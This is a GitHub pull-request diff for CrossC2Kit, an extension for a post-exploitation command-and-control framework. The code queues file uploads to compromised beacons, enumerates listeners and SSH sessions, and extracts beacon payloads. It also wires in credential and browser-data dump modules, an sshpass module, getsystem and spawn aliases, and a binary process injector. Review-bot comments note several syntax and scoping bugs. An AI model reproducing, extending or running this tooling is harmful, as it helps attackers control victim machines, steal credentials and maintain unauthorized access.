Merge pull request #118 from gloxec/CrossC2Kit-dev
Update CrossC2Kit & support inject and sshpass

Former-commit-id: fd8bfcd
gloxec authored Sep 13, 2021
2 parents 7a188fb + a13578b commit 8efd045
Showing 7 changed files with 525 additions and 30 deletions.
193 changes: 190 additions & 3 deletions CrossC2Kit/CrossC2Kit.cna
Expand Up @@ -133,7 +133,7 @@ sub bcrossc2_load_dyn_pro {
berror($beaconid, "[ CrossC2 ]: dynamic lib or executable filetype not found");
}
$ELFName = genTaskinfo_dyn($taskType, $taskName, $taskResType, $taskNeedRun, $taskNeedPersistence, $taskXorKey, $juicySize, $taskArgs);
bupload_raw($beaconid,$ELFName,$juicyData);
bupload_raw!($beaconid,$ELFName,$juicyData);
}

sub bcrossc2_load_dyn {
Expand Down Expand Up @@ -163,7 +163,7 @@ sub bcrossc2_load_dyn {
berror($beaconid, "[ CrossC2 ]: dynamic lib or executable filetype not found");
}
$ELFName = genTaskinfo_dyn($taskType, $taskName, $taskResType, $taskNeedRun, $taskNeedPersistence, $taskXorKey, $juicySize, $taskArgs);
bupload_raw($beaconid,$ELFName,$juicyData);
bupload_raw!($beaconid,$ELFName,$juicyData);
}

sub brun_script_in_mem {
Expand All @@ -187,5 +187,192 @@ sub brun_script_in_mem {
$juicySize = lof($loadFileName);

$scriptName = genMemScriptInfo($scriptType, $scriptEngPath, $taskResType, $juicySize, $taskArgs);
bupload_raw($beaconid,$scriptName,$juicyData);
bupload_raw!($beaconid,$scriptName,$juicyData);
}

@fileupload_list = @();
global(@fileupload_list);
sub bawait_upload {
local('$bid $file_lpath $file_rpath $file_rname $file_data $file_size $cb $handle $file_list_count');
$bid = $1;
$file_lpath = $2;
$file_rpath = $3;
$file_rname = $4;
$cb = $5;
$cb_args = $6;
$handle = openf($file_lpath);
$file_data = readb($handle, -1);
closef($handle);
$file_size = lof($file_lpath);

btask($bid, 'upload file '.$file_lpath.' to '.$file_rpath.$file_rname);

$file_list_count = size(@fileupload_list);
add(@fileupload_list, @($bid, $file_lpath, $file_rpath, $file_rname, $file_size, $cb, $cb_args, 'false' 'false'));
bupload_raw!($bid, $file_rpath.'/'.$file_rname, $file_data);
}

sub bawait_upload_raw {
local('$bid $file_lpath $file_rpath $file_rname $file_data $file_size $cb $handle $file_list_count');
$bid = $1;
$file_data = $2;
$file_rpath = $3;
$file_rname = $4;
$cb = $5;
$cb_args = $6;
$file_size = strlen($file_data);
$file_lpath = random_string(10);

btask($bid, 'upload rawData file-['.$file_lpath.'] to '.$file_rpath.$file_rname);

$file_list_count = size(@fileupload_list);
add(@fileupload_list, @($bid, $file_lpath, $file_rpath, $file_rname, $file_size, $cb, $cb_args, 'false' 'false'));
bupload_raw!($bid, $file_rpath.'/'.$file_rname, $file_data);
}

sub bcheck_file_size {
this('$bid $file_path $file_name $file_size $realsize $name $temp $f_rname $f_match_size ');
$bid = $1;
$file_path = $2;
$file_name = $3;
$file_size = $4;

bls($bid, $file_path, lambda({
this('@lines @subl $type $s $lastmod $name');
this('$file_name $file_size $realsize $f_key $f_value $f_rname')
@lines = split("\n", ["$3" trim]);
@subl = sublist(@lines, 1);
foreach $temp (@subl) {
($type, $s, $lastmod, $name) = split("\t", $temp);
if ($name eq $file_name) {
$realsize = long($s);
if ($realsize >= $file_size) {
foreach $f_key => $f_value (@fileupload_list) {
$f_rname = $f_value[3];
if ($name eq $f_rname) {
@fileupload_list[$f_key][7] = 'true';
break;
}
}
}
break;
}
}
}, $file_name => $file_name, $file_size => $file_size)
);
}
on heartbeat_1s {
local('$f_key $f_value $f_bid $f_lpath $f_rpath $f_rname $f_size $f_func $f_match_size');
if (size(@fileupload_list) > 0) {
foreach $f_key => $f_value (@fileupload_list) {
$f_bid = $f_value[0];
$f_lpath = $f_value[1];
$f_rpath = $f_value[2];
$f_rname = $f_value[3];
$f_size = $f_value[4];
$f_cb = $f_value[5];
$f_cb_args = $f_value[6];
$f_match_size = $f_value[7];
$f_cb_runed = $f_value[8];

if ($f_match_size eq 'false') {
bcheck_file_size($f_bid, $f_rpath, $f_rname, $f_size);
}
if ($f_match_size eq 'true') {
if ($f_cb_runed eq 'false') {
@fileupload_list[$f_key][8] = 'true';
[$f_cb: $f_bid, $f_cb_args];
break;
}
}
}
foreach $f_key => $f_value (@fileupload_list) {
$f_match_size = $f_value[7];
if ($f_match_size eq 'true') {
removeAt(@fileupload_list, int($f_key));
break;
}
}
}
}

ssh_alias list_uploadingFile {
println(@fileupload_list);
$bid = $1;
local('$f_key $f_value $f_bid $f_lpath $f_rpath $f_rname $f_size $f_func $f_match_size');
if (size(@fileupload_list) > 0) {
foreach $f_key => $f_value (@fileupload_list) {
$f_bid = $f_value[0];
$f_lpath = $f_value[1];
$f_rpath = $f_value[2];
$f_rname = $f_value[3];
$f_size = $f_value[4];
$f_cb = $f_value[5];
$f_cb_args = $f_value[6];
$f_match_size = $f_value[7];
$f_cb_runed = $f_value[8];
blog($bid, $f_lpath);
}
}
}

sub getCrossC2Site {
local('%beacon_site $beacon_count $Description, $Proto, $Host, $Port, $URI');
%beacon_site = %();
$beacon_count = 0;
foreach $site_list(sites()) {
($Description, $Proto, $Host, $Port, $URI) = values($site_list, @('Description', 'Proto', 'Host', 'Port', 'URI'));
if ("CrossC2" isin $Description) {
$beaconURL = $Proto.$Host.':'.$Port.$URI;
# 返回beacon_uri & beacon_description
%beacon_site[$beacon_count] = @($Description, $beaconURL);
$beacon_count += 1;
}
}
return %beacon_site;
}

sub getCrossC2Listener {
local('%beacon_listener $beacon_count');
%beacon_listener = %();
$beacon_count = 0;
foreach $listener(listeners_local()) {
if ("CrossC2" isin $listener) {
%beacon_listener[$beacon_count] = @($listener);
$beacon_count += 1;
}
}
return %beacon_listener;
}

sub getSSHSession {
local('%sessionMap $sessionCount');
%sessionMap = %();
$sessionCount = 0;
foreach $beacon (beacons()) {
($internal, $computer) = values($beacon, @('internal', 'computer'));
$tempMenuBar = $internal."@".$computer;
if (!-isactive $beacon['id']) {
} else if (-isssh $beacon['id']) {
%sessionMap[$sessionCount] = @($tempMenuBar);
$sessionCount += 1;
}
}
return %sessionMap;
}

sub getCrossC2Beacon {
local('$listener $type $beaconData');
$listener = $1;
$type = $2;

$beaconData = $null;
if ($listener && $type) {
if ($type eq 'lib') {
$beaconData = listener_info($listener)['CrossC2libBeacon'];
} else if ($type eq 'main') {
$beaconData = listener_info($listener)['CrossC2Beacon'];
}
}
return $beaconData;
}
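Review bot: In `bawait_upload` and `bawait_upload_raw` the record added to `@fileupload_list` ends with `'false' 'false'`, with no comma between the two literals, while `heartbeat_1s` and `bcheck_file_size` read and write indices 7 and 8 of that record; the tail of the element list should read `$cb_args, 'false', 'false'));`. In the same two subs `$cb_args` is assigned but is not named in the `local(...)` declaration, and the heartbeat handler does the same with `$f_cb`, `$f_cb_args` and `$f_cb_runed`, so these presumably end up in global scope and should be added to the declarations. The second `this(...)` line inside the `bls` callback has no terminating semicolon. `bawait_upload` also uses the result of `openf($file_lpath)` without checking it, so an unreadable local file is still queued and uploaded as whatever `readb` returns; check the handle and `berror` out before touching `@fileupload_list`.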
34 changes: 10 additions & 24 deletions CrossC2Kit/CrossC2Kit_Loader.cna
Expand Up @@ -14,6 +14,8 @@ include(script_resource("gather/browser/chrome_dump.cna"));
include(script_resource("gather/keychain/keychain_dump.cna"));
include(script_resource("gather/message/iMessage_dump.cna"));
include(script_resource("utils/portscan_result.cna"));
include(script_resource("process/processhelper.cna"));
include(script_resource("sshpass/sshpass.cna"));

sub openMemoryFileLoadDialogCallBack {
$taskFile = $3['taskFile'];
Expand Down Expand Up @@ -55,7 +57,7 @@ sub openMemoryFileLoadDialog {

sub openPythonImportDialogDialogCallBack {
$pythonFile = $3['pythonFile'];
blog($beaconid, $pythonFile);
btask($beaconid, $pythonFile);
$taskResType = "info"; # info -> normal message
$scriptType = 'python-import$';
$scriptEnginePath = 'null';
Expand All @@ -67,7 +69,7 @@ sub openPythonImportDialogDialogCallBack {
$filename = substr($scriptLocalPath, $pathIndex);

$importName = substr($filename, 0, lindexOf($filename, '.'));
blog($1, "[Python]: import ".$importName);
btask($1, "[Python]: import ".$importName);
$scriptType = $scriptType.$importName;

if ($scriptType && $scriptLocalPath) {
Expand Down Expand Up @@ -103,7 +105,7 @@ sub openRunMemoryFileDialogCallBack {
} else {
$shell = "cc2-run ".$fileAliasName." ".$taskArgs;
}
blog($beaconid, "[shell]: shell ".$shell);
btask($beaconid, "[shell]: shell ".$shell);
bshell($beaconid, $shell);
}

Expand All @@ -124,7 +126,7 @@ sub openRunMemoryFileDialog {
sub openSetEnvDialogCallBack {
$envKey = $3['envKey'];
$envValue = $3['envValue'];
blog($beaconid, "[shell]: shell setenv $envKey $envValue");
btask($beaconid, "[shell]: shell setenv $envKey $envValue");
bshell($beaconid, "setenv $envKey $envValue");
}

Expand All @@ -145,19 +147,10 @@ popup ssh {
menu "&Access" {
item "&Elevate" { openElevateDialog($1); }
}
menu "&Explore" {
item "&File Browser" {
local('$bid');
foreach $bid ($1) {
openFileBrowser($bid);
}
}
item "&Process List" { openProcessBrowser($1); }
}
menu "&CrossC2 Kit" {
menu "&executable" {
item "&list" {
blog($1, "[shell]: shell cc2-memoryList");
btask($1, "[shell]: shell cc2-memoryList");
bshell($1, "cc2-memoryList");
}
item "&load" {
Expand All @@ -176,28 +169,21 @@ popup ssh {
openPythonImportDialog($1);
}
}
item "&Spawn" {
local('$bid');
foreach $bid ($1) {
blog($bid, "[shell]: shell spawn");
bshell($bid, "spawn");
}
}
}

ssh_alias spawn {
blog($1, "[shell]: shell spawn");
btask($1, "[shell]: shell spawn");
bshell($1, "spawn");
}

ssh_alias getsystem {
blog($1, "[shell]: shell getsystem");
btask($1, "[shell]: shell getsystem");
bshell($1, "getsystem");
}

ssh_alias setenv {
if($2 && $3){
blog($1, "[shell]: shell setenv $2 $3");
btask($1, "[shell]: shell setenv $2 $3");
bshell($1, "setenv $2 $3");
} else {
berror($1, "*[error]: setenv env_name env_value");
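Review bot: In `openPythonImportDialogDialogCallBack` the two rewritten log calls take the beacon id from different places, `btask($beaconid, $pythonFile);` and `btask($1, "[Python]: import ".$importName);`. The same function reads the dialog values from `$3`, so `$1` there is presumably the dialog object rather than a beacon id, and the second call should likely pass `$beaconid` too. All of these callbacks depend on `$beaconid` being assigned somewhere outside the hunks shown, which deserves a one-line comment at the point of assignment, for example `# $beaconid is set by the dialog opener and read by its callback`. The function bodies continue outside the hunks, so this should be checked against the full file.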
Binary file added CrossC2Kit/process/libinjector64.so
Binary file not shown.